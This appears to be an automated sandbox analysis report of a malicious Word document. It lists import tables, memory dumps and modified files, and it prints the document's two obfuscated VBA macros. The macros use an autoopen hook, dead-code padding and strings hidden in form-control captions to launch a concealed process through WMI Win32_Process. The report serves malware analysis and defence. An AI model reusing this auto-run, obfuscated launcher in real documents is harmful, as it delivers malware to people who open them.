DeleteDC | 0x0 | 0x44704c | 0x57f30 | 0x56d30 | 0xcd |
CreatePatternBrush | 0x0 | 0x447050 | 0x57f34 | 0x56d34 | 0x48 |
CreateCompatibleDC | 0x0 | 0x447054 | 0x57f38 | 0x56d38 | 0x2e |
GetStockObject | 0x0 | 0x447058 | 0x57f3c | 0x56d3c | 0x1f4 |
CreatePen | 0x0 | 0x44705c | 0x57f40 | 0x56d40 | 0x49 |
CreateCompatibleBitmap | 0x0 | 0x447060 | 0x57f44 | 0x56d44 | 0x2d |
GetTextExtentPoint32W | 0x0 | 0x447064 | 0x57f48 | 0x56d48 | 0x205 |
GetCharWidthW | 0x0 | 0x447068 | 0x57f4c | 0x56d4c | 0x1a7 |
CreateFontW | 0x0 | 0x44706c | 0x57f50 | 0x56d50 | 0x3f |
StretchDIBits | 0x0 | 0x447070 | 0x57f54 | 0x56d54 | 0x29b |
SetWindowExtEx | 0x0 | 0x447074 | 0x57f58 | 0x56d58 | 0x293 |
Rectangle | 0x0 | 0x447078 | 0x57f5c | 0x56d5c | 0x246 |
PatBlt | 0x0 | 0x44707c | 0x57f60 | 0x56d60 | 0x22d |
StartPage | 0x0 | 0x447080 | 0x57f64 | 0x56d64 | 0x299 |
EndPage | 0x0 | 0x447084 | 0x57f68 | 0x56d68 | 0xdd |
SetAbortProc | 0x0 | 0x447088 | 0x57f6c | 0x56d6c | 0x260 |
AbortDoc | 0x0 | 0x44708c | 0x57f70 | 0x56d70 | 0x0 |
EndDoc | 0x0 | 0x447090 | 0x57f74 | 0x56d74 | 0xdb |
CreateFontIndirectW | 0x0 | 0x447094 | 0x57f78 | 0x56d78 | 0x3e |
GetBkColor | 0x0 | 0x447098 | 0x57f7c | 0x56d7c | 0x193 |
GetNearestColor | 0x0 | 0x44709c | 0x57f80 | 0x56d80 | 0x1dd |
GetBkMode | 0x0 | 0x4470a0 | 0x57f84 | 0x56d84 | 0x194 |
GetPolyFillMode | 0x0 | 0x4470a4 | 0x57f88 | 0x56d88 | 0x1ed |
GetROP2 | 0x0 | 0x4470a8 | 0x57f8c | 0x56d8c | 0x1ee |
GetStretchBltMode | 0x0 | 0x4470ac | 0x57f90 | 0x56d90 | 0x1f5 |
GetTextColor | 0x0 | 0x4470b0 | 0x57f94 | 0x56d94 | 0x1ff |
GetTextAlign | 0x0 | 0x4470b4 | 0x57f98 | 0x56d98 | 0x1fb |
GetTextFaceW | 0x0 | 0x4470b8 | 0x57f9c | 0x56d9c | 0x20b |
GetTextExtentPoint32A | 0x0 | 0x4470bc | 0x57fa0 | 0x56da0 | 0x204 |
GetWindowOrgEx | 0x0 | 0x4470c0 | 0x57fa4 | 0x56da4 | 0x213 |
SetWindowOrgEx | 0x0 | 0x4470c4 | 0x57fa8 | 0x56da8 | 0x294 |
ScaleViewportExtEx | 0x0 | 0x4470c8 | 0x57fac | 0x56dac | 0x258 |
SetViewportExtEx | 0x0 | 0x4470cc | 0x57fb0 | 0x56db0 | 0x28f |
OffsetViewportOrgEx | 0x0 | 0x4470d0 | 0x57fb4 | 0x56db4 | 0x225 |
SetViewportOrgEx | 0x0 | 0x4470d4 | 0x57fb8 | 0x56db8 | 0x290 |
SelectObject | 0x0 | 0x4470d8 | 0x57fbc | 0x56dbc | 0x25e |
Escape | 0x0 | 0x4470dc | 0x57fc0 | 0x56dc0 | 0x119 |
ExtTextOutW | 0x0 | 0x4470e0 | 0x57fc4 | 0x56dc4 | 0x123 |
TextOutW | 0x0 | 0x4470e4 | 0x57fc8 | 0x56dc8 | 0x2a0 |
RectVisible | 0x0 | 0x4470e8 | 0x57fcc | 0x56dcc | 0x245 |
PtVisible | 0x0 | 0x4470ec | 0x57fd0 | 0x56dd0 | 0x241 |
StartDocW | 0x0 | 0x4470f0 | 0x57fd4 | 0x56dd4 | 0x297 |
GetPixel | 0x0 | 0x4470f4 | 0x57fd8 | 0x56dd8 | 0x1eb |
BitBlt | 0x0 | 0x4470f8 | 0x57fdc | 0x56ddc | 0x12 |
GetViewportOrgEx | 0x0 | 0x4470fc | 0x57fe0 | 0x56de0 | 0x210 |
CreateSolidBrush | 0x0 | 0x447100 | 0x57fe4 | 0x56de4 | 0x52 |
GetViewportExtEx | 0x0 | 0x447104 | 0x57fe8 | 0x56de8 | 0x20f |
GetObjectW | 0x0 | 0x447108 | 0x57fec | 0x56dec | 0x1e4 |
DeleteObject | 0x0 | 0x44710c | 0x57ff0 | 0x56df0 | 0xd0 |
SetTextAlign | 0x0 | 0x447110 | 0x57ff4 | 0x56df4 | 0x28b |
MoveToEx | 0x0 | 0x447114 | 0x57ff8 | 0x56df8 | 0x221 |
LineTo | 0x0 | 0x447118 | 0x57ffc | 0x56dfc | 0x21d |
IntersectClipRect | 0x0 | 0x44711c | 0x58000 | 0x56e00 | 0x217 |
ExcludeClipRect | 0x0 | 0x447120 | 0x58004 | 0x56e04 | 0x11c |
GetClipBox | 0x0 | 0x447124 | 0x58008 | 0x56e08 | 0x1aa |
SetMapMode | 0x0 | 0x447128 | 0x5800c | 0x56e0c | 0x27b |
SetTextColor | 0x0 | 0x44712c | 0x58010 | 0x56e10 | 0x28d |
SetStretchBltMode | 0x0 | 0x447130 | 0x58014 | 0x56e14 | 0x289 |
SetROP2 | 0x0 | 0x447134 | 0x58018 | 0x56e18 | 0x286 |
SetPolyFillMode | 0x0 | 0x447138 | 0x5801c | 0x56e1c | 0x285 |
SetBkMode | 0x0 | 0x44713c | 0x58020 | 0x56e20 | 0x266 |
SetBkColor | 0x0 | 0x447140 | 0x58024 | 0x56e24 | 0x265 |
RestoreDC | 0x0 | 0x447144 | 0x58028 | 0x56e28 | 0x250 |
SaveDC | 0x0 | 0x447148 | 0x5802c | 0x56e2c | 0x257 |
CreateDCW | 0x0 | 0x44714c | 0x58030 | 0x56e30 | 0x30 |
Ellipse | 0x0 | 0x447150 | 0x58034 | 0x56e34 | 0xd9 |
CreateEllipticRgn | 0x0 | 0x447154 | 0x58038 | 0x56e38 | 0x36 |
CreateBitmap | 0x0 | 0x447158 | 0x5803c | 0x56e3c | 0x28 |
LPtoDP | 0x0 | 0x44715c | 0x58040 | 0x56e40 | 0x21b |
GetDeviceCaps | 0x0 | 0x447160 | 0x58044 | 0x56e44 | 0x1b5 |
DPtoLP | 0x0 | 0x447164 | 0x58048 | 0x56e48 | 0x92 |
GetTextMetricsW | 0x0 | 0x447168 | 0x5804c | 0x56e4c | 0x20d |
GetWindowExtEx | 0x0 | 0x44716c | 0x58050 | 0x56e50 | 0x212 |
COMDLG32.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetFileTitleW | 0x0 | 0x44703c | 0x57f20 | 0x56d20 | 0xa |
WINSPOOL.DRV (4)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetJobW | 0x0 | 0x447684 | 0x58568 | 0x57368 | 0x76 |
DocumentPropertiesW | 0x0 | 0x447688 | 0x5856c | 0x5736c | 0x4e |
ClosePrinter | 0x0 | 0x44768c | 0x58570 | 0x57370 | 0x1d |
OpenPrinterW | 0x0 | 0x447690 | 0x58574 | 0x57374 | 0x8f |
ADVAPI32.dll (14)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
RegDeleteValueW | 0x0 | 0x447000 | 0x57ee4 | 0x56ce4 | 0x242 |
RegSetValueExW | 0x0 | 0x447004 | 0x57ee8 | 0x56ce8 | 0x278 |
RegCreateKeyExW | 0x0 | 0x447008 | 0x57eec | 0x56cec | 0x233 |
RegQueryValueW | 0x0 | 0x44700c | 0x57ef0 | 0x56cf0 | 0x269 |
RegOpenKeyW | 0x0 | 0x447010 | 0x57ef4 | 0x56cf4 | 0x25e |
RegEnumKeyW | 0x0 | 0x447014 | 0x57ef8 | 0x56cf8 | 0x24a |
RegDeleteKeyW | 0x0 | 0x447018 | 0x57efc | 0x56cfc | 0x23e |
RegOpenKeyExW | 0x0 | 0x44701c | 0x57f00 | 0x56d00 | 0x25b |
RegQueryValueExW | 0x0 | 0x447020 | 0x57f04 | 0x56d04 | 0x268 |
GetFileSecurityW | 0x0 | 0x447024 | 0x57f08 | 0x56d08 | 0x12a |
SetFileSecurityW | 0x0 | 0x447028 | 0x57f0c | 0x56d0c | 0x2a4 |
RegSetValueW | 0x0 | 0x44702c | 0x57f10 | 0x56d10 | 0x279 |
RegCloseKey | 0x0 | 0x447030 | 0x57f14 | 0x56d14 | 0x22a |
RegCreateKeyW | 0x0 | 0x447034 | 0x57f18 | 0x56d18 | 0x236 |
SHELL32.dll (4)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
DragFinish | 0x0 | 0x4473c8 | 0x582ac | 0x570ac | 0x1c |
SHGetFileInfoW | 0x0 | 0x4473cc | 0x582b0 | 0x570b0 | 0xba |
ExtractIconW | 0x0 | 0x4473d0 | 0x582b4 | 0x570b4 | 0x2c |
DragQueryFileW | 0x0 | 0x4473d4 | 0x582b8 | 0x570b8 | 0x20 |
SHLWAPI.dll (5)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
PathFindFileNameW | 0x0 | 0x4473dc | 0x582c0 | 0x570c0 | 0x49 |
PathStripToRootW | 0x0 | 0x4473e0 | 0x582c4 | 0x570c4 | 0x97 |
PathIsUNCW | 0x0 | 0x4473e4 | 0x582c8 | 0x570c8 | 0x71 |
PathFindExtensionW | 0x0 | 0x4473e8 | 0x582cc | 0x570cc | 0x47 |
PathRemoveFileSpecW | 0x0 | 0x4473ec | 0x582d0 | 0x570d0 | 0x8b |
ole32.dll (8)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
CoInitializeEx | 0x0 | 0x447698 | 0x5857c | 0x5737c | 0x3e |
CoUninitialize | 0x0 | 0x44769c | 0x58580 | 0x57380 | 0x6b |
OleDestroyMenuDescriptor | 0x0 | 0x4476a0 | 0x58584 | 0x57384 | 0xeb |
OleCreateMenuDescriptor | 0x0 | 0x4476a4 | 0x58588 | 0x57388 | 0xe9 |
IsAccelerator | 0x0 | 0x4476a8 | 0x5858c | 0x5738c | 0xcd |
OleTranslateAccelerator | 0x0 | 0x4476ac | 0x58590 | 0x57390 | 0x10a |
CoCreateInstance | 0x0 | 0x4476b0 | 0x58594 | 0x57394 | 0x10 |
CoTaskMemFree | 0x0 | 0x4476b4 | 0x58598 | 0x57398 | 0x67 |
OLEAUT32.dll (5)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
VarDateFromStr | 0x5e | 0x4473b0 | 0x58294 | 0x57094 | - |
SysAllocStringLen | 0x4 | 0x4473b4 | 0x58298 | 0x57098 | - |
VariantClear | 0x9 | 0x4473b8 | 0x5829c | 0x5709c | - |
VariantChangeType | 0xc | 0x4473bc | 0x582a0 | 0x570a0 | - |
VariantInit | 0x8 | 0x4473c0 | 0x582a4 | 0x570a4 | - |
Memory Dumps (93)
Name | Process ID | Start VA | End VA | Dump Reason | PE Rebuild | Bitness | Entry Points |
---|---|---|---|---|---|---|---|
buffer | 6 | 0x00350000 | 0x00350FFF | First Execution | - | 32-bit | 0x00350000 |
buffer | 6 | 0x00330000 | 0x00344FFF | First Execution | - | 32-bit | 0x00330000 |
buffer | 8 | 0x002F0000 | 0x002F0FFF | First Execution | - | 32-bit | 0x002F0000 |
buffer | 8 | 0x00240000 | 0x00254FFF | First Execution | - | 32-bit | 0x00240000 |
buffer | 10 | 0x00270000 | 0x00270FFF | First Execution | - | 32-bit | 0x00270000 |
buffer | 10 | 0x003A0000 | 0x003B4FFF | First Execution | - | 32-bit | 0x003A0000 |
buffer | 10 | 0x003D0000 | 0x003E5FFF | Marked Executable | - | 32-bit | 0x003D1900 |
buffer | 12 | 0x00270000 | 0x00270FFF | First Execution | - | 32-bit | 0x00270000 |
buffer | 12 | 0x00300000 | 0x00314FFF | First Execution | - | 32-bit | 0x00300000 |
buffer | 12 | 0x00340000 | 0x00355FFF | Marked Executable | - | 32-bit | 0x00341900 |
buffer | 13 | 0x00D80000 | 0x00DACFFF | First Execution | - | 32-bit | 0x00D873A0 |
buffer | 13 | 0x00D80000 | 0x00DACFFF | Content Changed | - | 32-bit | 0x00D8D210 |
buffer | 13 | 0x00D80000 | 0x00DACFFF | Content Changed | - | 32-bit | 0x00D8C550 |
buffer | 13 | 0x00D80000 | 0x00DACFFF | Content Changed | - | 32-bit | 0x00D8B950 |
buffer | 13 | 0x00D80000 | 0x00DACFFF | Content Changed | - | 32-bit | 0x00D8AF00 |
buffer | 13 | 0x00D80000 | 0x00DACFFF | Content Changed | - | 32-bit | 0x00D89000 |
buffer | 13 | 0x00D80000 | 0x00DACFFF | Content Changed | - | 32-bit | 0x00D823F0 |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | First Execution | - | 32-bit | 0x02E86D8E |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E8E090 |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E87CB7 |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E8C3E8 |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E882DF |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E95F88 |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E8C4C1 |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E86C45 |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E8705F |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E887F0 |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E90FA0 |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E9AE50 |
768.exe | 15 | 0x00400000 | 0x0047FFFF | Content Changed | - | 32-bit | - |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DBCCA0 |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DBBEE0 |
buffer | 13 | 0x00D80000 | 0x00DACFFF | Content Changed | - | 32-bit | 0x00D8D45A |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DB7050 |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DB8000 |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DBA000 |
768.exe | 15 | 0x00400000 | 0x0047FFFF | Content Changed | - | 32-bit | 0x0041211A |
768.exe | 15 | 0x00400000 | 0x0047FFFF | Content Changed | - | 32-bit | 0x00404841 |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E62480 |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DC4C90 |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DC0500 |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DC8650 |
768.exe | 15 | 0x00400000 | 0x0047FFFF | Content Changed | - | 32-bit | 0x00406A5B |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DCB7A0 |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DE1BD0 |
768.exe | 15 | 0x00400000 | 0x0047FFFF | Content Changed | - | 32-bit | 0x00402393 |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DCA1E0 |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DDEF70 |
768.exe | 15 | 0x00400000 | 0x0047FFFF | Content Changed | - | 32-bit | 0x0040A16F |
768.exe | 15 | 0x00400000 | 0x0047FFFF | Content Changed | - | 32-bit | 0x00405F29 |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DC9880 |
768.exe | 15 | 0x00400000 | 0x0047FFFF | Content Changed | - | 32-bit | 0x00403C17 |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DD3110 |
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E68210 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E1D4B0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DB26A0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DB5000 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DBDF20 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E60010 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E61A90 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E8A194 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DC32A0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E4CCB0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E80890 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E073C0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E636C0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E5EF60 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E76220 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E78490 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E6E340 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E6CE00 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E7AF40 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E119F0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E15EB0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E14EA0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DD37D0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DD4CA0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DC0060 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E6A290 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E6E340 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E6CE00 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E69CD0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DE0F80 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E1E7E0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E3B1B0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E31470 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DD95D0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E4A180 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E46610 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E953D2 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DCA220 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E2B600 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DFFC70 |
...
|
c97833e6456aa2bfe9be614f9c3ae41a8ef764b1cc3af92c6a6f273c62309122 | Embedded File | Text | Whitelisted |
File Reputation Information
Severity | Whitelisted |
First Seen | 2012-11-16 07:03 (UTC+1) |
Last Seen | 2019-09-09 16:32 (UTC+2) |
ec73a93e583de41cceef114addca1400548914e11245fcb22fc404a6b9e97e6c | Embedded File | Text | Whitelisted |
File Reputation Information
Severity | Whitelisted |
First Seen | 2015-09-23 11:28 (UTC+2) |
Last Seen | 2019-07-04 20:54 (UTC+2) |
C:\Users\aETAdzjz\Desktop\INC_4807280588838_XJ.doc | Sample File | Word Document | Unknown |
Office Information
Revision | 1 |
Create Time | 2019-09-16 06:30:00+00:00 |
Modify Time | 2019-09-16 06:30:00+00:00 |
Document Information
Application | Microsoft Office Word |
App Version | 16.0000 |
Template | Normal.dotm |
Document Security | SecurityFlag.NONE |
Page Count | 1 |
Line Count | 5 |
Paragraph Count | 1 |
Word Count | 110 |
Character Count | 632 |
Chars With Spaces | 741 |
ScaleCrop | |
SharedDoc | |
Controls (1)
CLSID | Control Name | Associated Vulnerability |
---|---|---|
{8BD21D50-EC42-11CE-9E0D-00AA006002F3} | FormsOptionButton | - |
VBA Macros (2)
Macro #1: EE6Y9p8Z
Attribute VB_Name = "EE6Y9p8Z"
Function j3wwFfB()
Dim r8W_ZQh As Object
If 12 = 289 Then
Dim E1_zc9tZ As Boolean
Select Case wVIkFm2Y
Case 738
Dim WDqijP8j As Boolean
TZjCBSi = rlJAoATs
Dim Ti3Bbj As Boolean
aONBK0 = 664
Dim bwGjzIQ As Boolean
TSCBiPi = CVar(84)
Dim C1jXHj As Boolean
Case 124
Dim wXuzbL As Boolean
YimziP = SEO_HB_
Dim t7m6Jpk As Boolean
H4s28Gi = CVar(k7zwwi)
Dim CS_B9Y As Boolean
cP9TU5C = 65
Dim FZsjHHjU As Boolean
End Select
End If
Set j3wwFfB = CreateObject(nCRX1MBI + ThisDocument.jq5ZKGz9.Caption + "Startup" + Od4G1G)
Dim MZTz7tmB As Object
If 630 = 840 Then
Dim H0szNTi As Boolean
Select Case Y5nmfmUs
Case 731
Dim cmniVp As Boolean
LwiYzw9r = htIJdOo
Dim ozLlBp_ As Boolean
biXHsiQZ = 275
Dim F1owf5 As Boolean
uYJY2U = CVar(50)
Dim zCMjtw1D As Boolean
Case 616
Dim DjAl5D3 As Boolean
pIAqs9ZG = GnDF0kNN
Dim PAlo31i As Boolean
ZFjTZP = CVar(TijUrOTB)
Dim WCAr1C As Boolean
piWz3aK = 763
Dim imUp1Y As Boolean
End Select
End If
j3wwFfB. _
ShowWindow! _
= SiZBGQU + j5jUXu + RS03Kw + mrEwuf8s + Gju7AC + UPi25t
Dim Yji58I As Object
If 137 = 979 Then
Dim paz1mk As Boolean
Select Case R1OSdi
Case 254
Dim Rj_nOQ As Boolean
cvjwboW = KE9iMqi
Dim UwZ5t_SO As Boolean
HFzhAJR = 455
Dim Busd94 As Boolean
NwI5cUi = CVar(66)
Dim LpBjfNE As Boolean
Case 780
Dim Qai8Z7 As Boolean
NArUcAc = YaisvS
Dim vn1bhhn As Boolean
d23TWNE6 = CVar(IRzok_d)
Dim aajI3ii As Boolean
EudD2mbl = 970
Dim FNZzrwfI As Boolean
End Select
End If
Dim SjlWKpU As Object
If 626 = 278 Then
Dim zwGhvZJ As Boolean
Select Case bh9sYic
Case 265
Dim cjBaUi As Boolean
ls9wrdY = AKpluX
Dim i3poID As Boolean
Rwbjhbna = 675
Dim X121DkjX As Boolean
ouzM8T = CVar(336)
Dim W0loDEW As Boolean
Case 640
Dim idjiPiD6 As Boolean
nwFIvh = f8PjOtB0
Dim pwwiVn As Boolean
zuiQwRrC = CVar(S21HbIvw)
Dim M2hQV9 As Boolean
ZRccR3j = 731
Dim RL94LvN As Boolean
End Select
End If
End Function
Sub autoopen()
Dim uo2GtE As Object
If 520 = 161 Then
Dim YYCwG5 As Boolean
Select Case K8iZCb6W
Case 349
Dim T8N3UA As Boolean
ndlRFm9 = RqhB3RW
Dim zL0cui As Boolean
ku7lDBJ = 326
Dim IX737c As Boolean
dr4Tfq = CVar(22)
Dim DBaiTt As Boolean
Case 39
Dim j6N0wRp As Boolean
mH03ZDt = Iw1FMED
Dim zuK1bQXK As Boolean
HOSBf7 = CVar(uLq0rn4)
Dim mltJ6Q As Boolean
hM6rsfO = 540
Dim jM4wUJb As Boolean
End Select
End If
Ujrahq0
Dim BdiCCt As Object
If 538 = 653 Then
Dim tDczzL As Boolean
Select Case XzJ8Cr9
Case 844
Dim DiwDsm As Boolean
bt60M1q = kmj2F6A
Dim VPRFVjrz As Boolean
aAKcGL = 334
Dim vjQ9iwr As Boolean
OZ0ow85 = CVar(57)
Dim ScYZRZ As Boolean
Case 705
Dim jUhKZq1 As Boolean
iicwjY = VY_huE
Dim AzwEjP As Boolean
zFXbL3 = CVar(KqWVtU)
Dim BP3B49 As Boolean
N6Z2CX = 933
Dim kXzbB70 As Boolean
End Select
End If
End Sub
Macro #2: ntowNDG
Attribute VB_Name = "ntowNDG"
Function Ujrahq0()
Dim XTVQ0Ka As Object
If 425 = 372 Then
Dim z0KWiS As Boolean
Select Case YVd2Gj
Case 984
Dim LhppX1 As Boolean
p0CfSMzw = O8rwLmp
Dim FEpWzJK As Boolean
nztJ8Zj = 321
Dim HwRhpk As Boolean
MZaVC_ = CVar(393)
Dim wrImPV As Boolean
Case 303
Dim JDisHAR As Boolean
SfJOkZFs = nUSszT1A
Dim uAzqzVm As Boolean
GOILqriQ = CVar(PD6raXI)
Dim jZRAjzw As Boolean
YaOw0vbr = 692
Dim jBSCvo As Boolean
End Select
End If
jKSWHV = dkCEwiB + ThisDocument.jZdtBt.Caption + ThisDocument.IQWa7VJ.Caption + ThisDocument.dqnHAG.Caption + Da3HRzw5
Dim BLS3b6GT As Object
If 35 = 585 Then
Dim zX9j8oQ As Boolean
Select Case cn5Gc2
Case 978
Dim w9omBk As Boolean
BTmn3mX = HI0w4aZ
Dim hUIE1AO As Boolean
S2A7zY = 446
Dim RpDV8P4i As Boolean
LXFhOvj8 = CVar(637)
Dim wdlZFdB As Boolean
Case 919
Dim LWlz8Fv As Boolean
kFQljS = DzmQZ1I
Dim tDpQdNt4 As Boolean
hkIci8X = CVar(HV8TZr)
Dim cWwjcM As Boolean
jI5O3i = 754
Dim wWz7XIT As Boolean
End Select
End If
Dim dKvih5tn As Object
If 698 = 831 Then
Dim t7J3cObZ As Boolean
Select Case XtsFhNXw
Case 787
Dim viqpkr As Boolean
iMcz6Nck = Lmk_HVN2
Dim wTj7sjBU As Boolean
OwntzEa = 197
Dim Zn9zrjSv As Boolean
QbuO8wS = CVar(244)
Dim FZMIU6a As Boolean
Case 247
Dim sKD7kC9C As Boolean
rWZwF57 = cq8hY4h
Dim Zo5RHT As Boolean
TY3sQ5wz = CVar(knGPY3)
Dim Q6oqDCnp As Boolean
fjPG4Vj = 31
Dim rSzJui As Boolean
End Select
End If
wpLnXI = CreateObject("winm" + "gmts:Win32_Process").Create(jKSWHV + Gn9GzS, n9NZUAO, j3wwFfB, bfhbrw)
Dim KNk_lPH As Object
If 358 = 649 Then
Dim fH5f2i6 As Boolean
Select Case P7FFV2
Case 711
Dim pCzsNwcp As Boolean
LMwfjZ = I2uL5muE
Dim SH3uZmc As Boolean
hZTc2J = 511
Dim XjzWquZr As Boolean
fJL9Ju = CVar(562)
Dim iKfwKC As Boolean
Case 559
Dim ki2Z4C As Boolean
PiRSrYcC = s8DrPjo
Dim SLpWv3f As Boolean
rVWjwPpm = CVar(fMsdIwM)
Dim zSRwUi As Boolean
hLhaLVlL = 333
Dim PKzCoGJ9 As Boolean
End Select
End If
End Function
c:\users\aetadzjz\appdata\local\gdipfontcachev1.dat | Modified File | Stream | Unknown |
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0 | Modified File | Stream | Unknown |
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0 | Modified File | Stream | Unknown |
